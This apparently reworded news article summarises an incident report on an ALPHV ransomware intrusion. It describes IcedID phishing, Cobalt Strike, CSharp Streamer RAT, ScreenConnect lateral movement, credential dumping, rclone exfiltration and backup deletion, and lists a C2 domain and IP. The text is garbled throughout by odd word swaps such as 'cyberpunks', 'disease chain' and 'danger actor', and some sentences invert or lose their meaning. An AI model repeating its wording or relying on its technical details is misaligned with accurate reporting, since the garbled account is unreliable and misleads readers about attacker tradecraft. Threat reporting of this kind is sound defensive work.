ScreenConnect and RDP access were installed to begin the ALPHV ransomware deployment

Ransomware is utilized by cyberpunks to manipulate victims’ data, closing it until a ransom is delivered. This way of cyber attack is advantageous as it brings the benefit of data’s immediacy and energy to people and businesses, so they hold no option but to pay for immediate recoveries. An attack began with an email including a forked IcedID variant that highlighted payload delivery.

After achieving initial access, the intruder installed ScreenConnect on the computer for remote management, abusively used Cobalt Strike beacons, and deployed CSharp Streamer RAT to gain credentials and shift laterally within domain switches and servers. During the title stage, exposed data was put in ‘confucius_cpp,’ a unique program of which rclone conducted the extraction.  For eight days, they conducted a periodic deployment of ScreenConnect installers across broadcasters utilizing WMI before ultimately giving ALPHV ransomware payloads after deleting backups.

Ransomware deployment of ALPHV

The nasty spam electronic mail, which tricked the prey into downloading and unzipping a folder with a readme and Visual Basic Script (VBS), acted as the initial access vector. Starting VBS executed an entrenched, obfuscated IcedID loader DLL that declined and ran another IcedID DLL payload, finishing the disease chain, reads the DFIR news. This is compatible with a known negative action where the same method was employed to circulate an IcedID division that deals with payload deployment rather than banking actions.

Several methods were used to remove Cobalt Strike beacons, including bitsadmin, certutil, and PowerShell. CSharp Streamer RAT keeps the industry through planned tasks in LSASS credential dumping, lateral movement, and C2 communications. IcedID secured its industry by utilizing planned jobs, while ScreenConnect was created constantly across reboots. During lateral motion into winlogon.exe and rundll32.exe, method injection was followed. Renamed installers were deleted by the actor.

 

Key actions affected LSASS credential dumping, which was validated via memory research, and dcsync was conducted from the beachhead to a field control for credential harvesting. This was observed by the danger actor performing initial credit using native Windows utilities established via IcedID and later manipulating ScreenConnect for more survey management.
 

SoftPerfect netscan for network scanning took place on other days, targeting IP ranges plus ports of RPC, SMB, RDP, and Veeam backups.

ScreenConnect installers were then laterally replicated via SMB and became deployed with wmiexec.py to get distant managing. The assaulter broadly utilized RDP for lateral motion including proxying via CSharp Streamer. Before exfiltration, a business tool named confucius_cpp listed systems by LDAP query, accessed shares based on keywords, and squeezed exposed data. The assailant also extended documents utilizing the Firefox structure.

The danger actor leveraged numerous tools during the intrusion:- 

  • IcedID for initial access transmitting with modalefastnow[.]com
  • Cobalt Strike beacons across hosts relating to followed C2 infrastructure
  • CSharp Streamer RAT at 109.236.80.191 utilizing WebSockets over turning docks
  • ScreenConnect remote access devices deployed through renamed binaries managed via wmiexec.py

While Firefox was employed for record preview and downloading rclone, which was achieved via a VBS script for data exfiltration. The final payload was ALPHV ransomware, directed on the backup server and then deployed across hosts via xcopy and WMI-initiated performance after deleting backups. 

A ransom message referencing the group’s Twitter was gone post-encryption.